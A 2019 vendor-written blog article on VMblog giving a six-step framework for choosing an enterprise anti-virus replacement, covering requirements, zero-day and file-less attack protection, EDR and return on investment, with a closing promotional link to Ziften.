Virtualization Technology News and Information
Article
Search:
RSS
Follow VMblog.com:
Improve end user experience in VDI, DaaS and physical endpoint environments
5 Steps to Selecting an Enterprise Anti-Virus (AV) Replacement

Written by Roark Pollock, vice president of marketing for Ziften Technologies.

If you're in the market to replace or upgrade your existing anti-virus (AV) solution and plan to spend ample time researching differing enterprise endpoint security software, you might begin to envy "cat herders."  This is because cat herding looks easy compared to clearly understanding endpoint security these days.  There are oceans of information, often misleading, causing downright confusion, thus it is hard to know where to start.  Additionally, the industry is full of confusing jargon, that is used inconsistently.

For a successful process, a more simple framework is required with the key steps outlined here:

  • Step 1:  Answer the Question: What is Wrong with Your Current AV Solution?
  • Step 2:  Define your Operational Requirements.
  • Step 3:  Focus on the Most Important Protection Capabilities.
  • Step 4:  Get Built-in Endpoint Detection and Response (EDR).
  • Step 5:  Find Out What More Can I Get?
  • Step 6:  Bonus Pro Tip

Most posted marketing content tries to get the reader to jump right to the answer (i.e. buy the vendor's product). But let's start this exercise differently...

Step 1:  Answer the Question: What is Wrong with Your Current AV Solution?

Before researching new endpoint security solutions to replace your current AV or next-generation AV (NGAV), start with documenting what's not working today. Consider this the most important step in this framework.

Do the following:

  • Write down what's not working -Get your priorities on paper.
  • Quantify it if possible - Now for each item that you've written down that isn't working, try and quantify the scale of the miss.  This helps build a baseline to measure success at the end of the purchasing process.
  • Socialize it and get agreement - This is usually the most surprising part of the exercise.  Review your issue list with as many IT and security team members as possible - anyone that touches those endpoints - be they workstations, laptops, servers, or virtual machines.  The goal is to achieve a broad consensus.
  • Document what future state you want to achieve - Finally, once you have agreement on the current state and what's not working, try and write down what future state you want to achieve.  This does not have to be perfect, but it will help serve as a guide as you go through the next several steps in this framework.

To get you started, below are some examples of issues within organizations (the ones we most often hear when speaking to customers).

  • Our AV product simply fails to stop many threats / attacks.
  • AV causes too many laptop performance issues for users.
  • We have little to no visibility or data on what's actually happening on the endpoint.
  • End user productivity is reduced because they have to manually deliver laptops to IT for analysis and remediation.
  • It takes us way too long to investigate and respond to endpoint alerts.
  • We have too many endpoint tools in addition to AV.  AV is not the only issue.
  • Our AV product costs too much.

This is not an exhaustive list, but simply something to get you started thinking.  Often the problem is more spread-out than you first assume.

Step 2:  Define your Operational Requirements.

This step is usually much easier for technical teams than the first step.  Define your operational environment, and what requirements you will have for the solutions you review.  This involves answering the following questions:

  • Do you have an inventory of endpoints on your network that need protection?  If so, what device types / endpoints are you trying to protect?  This might include laptops, desktops, workstations, tablets, smartphones, servers, rack servers, virtual machines, virtual desktop infrastructure, etc.
  • What operating systems are running on those devices?  Windows, Windows Server, macOS, Linux, Redhat Linux, Ubuntu Linux, CentOS Linux, Fedora, Scientific Linux, iOS, Android, etc.  List the versions of each operating system as well, especially if you have really old versions.
  • Do you want a cloud-delivered endpoint security software solution, or will you require an on-premise deployment of the backend architecture?
  • Will you deploy on only company owned endpoints, or does this include employee owned endpoints?
  • Who will ultimately be using the endpoint security solution you put into place?  This could be a single person or many different teams such as security operations (SecOps), IT operations (IT Ops), helpdesk / end user support, server support, development operations (DevOps), and even governance, risk management and compliance.
  • What systems integrations would you like to set up?  This can often include malware / sandboxing solutions, security incident and event management (SIEM) systems, ticketing or orchestration systems, vulnerability assessment and patch management systems, and other data analysis tools.

Step 3:  Focus on the Most Important Protection Capabilities.

Traditional or legacy enterprise antivirus solutions are all about threat prevention.  All NG-AV and endpoint security software solutions also deliver this same function.  The key is knowing where to focus your efforts in evaluating the efficacy of these solutions.  Here I divide the types of endpoint threats into 3 categories:

  1. Known, file-based malware
  2. Unknown or zero-day, file-based malware
  3. "So-called" file-less attacks

The first category of threats, known malware, is largely a solved problem by all traditional AV and NGAV products whether based on signatures, heuristics, behavioral analysis, or machine learning.  This is certainly not to say that there are not differences in efficacy but think of these attacks at "background radiation".  All the endpoint protection tools out there should do a good job in protecting against these attacks.  And more importantly, these threats are becoming less of an issue in successful attacks because most of the AV tools do work well against them.  So do not focus your efficacy evaluations on this category of protection.  Take this for granted.

The key area to focus on is protection against the other two categories of threats, zero-day malware, and file-less attacks.

For years now, successful malware attacks on enterprises predominantly are single-use or employ polymorphic techniques.  As far back as 2015, Webroot in their Threat Brief found that up to 97% of successful enterprise malware infections were single-use or polymorphic.  Thus, protection against these zero-day malware threats is a huge area to focus on in your evaluations.

Unfortunately, even stopping even zero-day malware isn't enough these days.  When evaluating endpoint security solution efficacy our third category of attacks is another area we need to investigate.  This category of file-less attacks primarily consists of:

  • Phishing and spear-phishing attacks via Office documents
  • Weaponized PDF attacks
  • Direct to memory Powershell attacks

Why?  In Symantec's 2019 Internet Security Threat Report, they found that 48% of malicious email attachments are Microsoft Office files, up from 5% in 2017.  And IBM in their X-Force Research in 2018 found that 57% of successful attacks leverage direct-to-memory Powershell techniques.

So, while protection against known malware is nice, it is no longer enough or an important differentiator in evaluating an AV replacement.

Focus on protection efficacy against unknown, zero-day malware, and file-less attacks like weaponized documents and in-memory attacks.

Step 4:  Get Built-in Endpoint Detection and Response (EDR).

Cybersecurity professionals have all moved beyond that idea that threat protection can be fully automated and 100% effective.  That's why there is so much attention paid to detection and response capabilities in today's endpoint security discussions.

The basic premise behind EDR is to find those threats, whether external or internal, that have bypassed our protection efforts and are now resident inside the enterprise.  Once found, it is critically important to analyze the threat kill chain to determine the full scope of the attack going back in time to the original root cause of the successful attack.  Then apply that knowledge to quarantine and eliminate the threat.

When you first start looking at EDR there are a few key questions you'll want to ask internally.

  1. Is it a Nice to Have?  Are you getting EDR as a "nice to have", or do you fully intend to implement regular threat hunting and response? 
  2. What level of time commitment and expertise is required?  Will you conduct threat hunting and response internally or will you want to outsource the function?
  3. What level of visibility does the solution provide?  In evaluating the product, given that the average dwell time of threats in the enterprise is typically measured in multiple months, does the EDR solution maintain collected endpoint visibility data long enough to allow you to "ferret" out the original intrusion point?  Or is that visibility data deleted to save storage costs before you need it?  This is a super important point, and a simple one to answer for any solution.
  4. What response and remediation actions are available?  Do these fit your needs and will they solve your original issues in step 1.  Does the solution allow for response on remote endpoints?  Is a workflow available for investigation and response?
  5. Do you want to automate response actions?  If so, what is available for your future use?

Typically, the most important aspect that EDR solutions provide is the granular endpoint visibility provided that can be of immense usefulness to a variety of teams within the organization, and for a variety of purposes.

Step 5:  Find Out What More Can I Get?

Good endpoint security starts well before any AV or endpoint protection tool starts inspecting a file to determine if it is a threat or not.  It starts with maintaining good endpoint hygiene in order to keep the attack surface as small as possible.  These endpoint hardening practices are by far the most effective threat prevention available.

And since leading endpoint security software solutions now provide rich endpoint visibility some are starting to incorporate these functions as well.

If you want to get more from your endpoint protection platform, look for functionality that includes items like:

  • Endpoint discovery and inventory.  Many endpoint protection platforms can now comprehensively discover, fingerprint and inventory all connected devices, even infrequently connected devices.  This helps to find and possibly eliminate rogue devices.
  • Application discovery and inventory.  This can include a detailed cataloging of the applications installed on each and every managed endpoint.  It can also be used as means to discover the use of unauthorized applications by insiders.
  • Endpoint vulnerability discovery and prioritization.  Given that security agents on the endpoint monitor the OS and applications in real-time, they may provide for detailed vulnerability tracking with no additional agent or external scanning or scheduling required.
  • Configuration hardening and compliance.  Additionally, these endpoint security agents may be able to continuously monitor the endpoint security controls in place and report on or remediate endpoints that are non-compliant to your security policies.

At the end of the day, endpoint visibility is valuable across the entire organization, not just to the security team.

Step 6:  Bonus Pro Tip

Depending on the uses of whatever endpoint protection platform that you evaluate and eventually select, look at the possible return on investment (ROI) that you might be able to justify.  Demonstrating a positive ROI will surely help you justify an upgrade from your existing AV solution.  So how might you demonstrate an ROI from an endpoint security tool?  Look for the following:

  1. Can you replace multiple existing endpoint products with your new endpoint protection platform?  Certainly, it will replace your AV tool, but do you have a NGAV tool as well it will replace?  What about an existing, standalone EDR tool?  Or an incident response solution?  Or a vulnerability scanner?  Get creative and see if you can make it pay for itself.
  2. Additionally, use it to save lots of money on those over provisioned Adobe and Microsoft Office licenses that may not be getting used.  Anything you can do here might help you get a new endpoint security software solution for next to nothing.  Heck, if you're lucky you might even save money.

If you want to read more about replacing your anti-virus solution with Ziften, check out some of our additional resources at https://ziften.com/replace-your-anti-virus/

##

About the Author

Roark Pollock 

Roark Pollock is vice president of marketing for Ziften Technologies.  He is a marketing leader with over 20 years of experience in early-stage and global IT, networking and security companies. He is a frequent company spokesperson and evangelist for industry events, print, online, and social media.

Published Wednesday, May 01, 2019 7:27 AM by David Marshall
Get This Featured White Paper: Examining the Effectiveness of Digital Twins in Network Modeling
You may also be interested in this white paper: Gorilla Guide to Real-Time Ransomware Detection and Recovery
Comments
There are no comments for this post.
To post a comment, you must be a registered user. Registration is free and easy! Sign up now!
GenAI
DTW-NA
innovatrix
capacity-europe
vExpert
Calendar
<May 2019>
SuMoTuWeThFrSa
2829301234
567891011
12131415161718
19202122232425
2627282930311
2345678
OSZAR »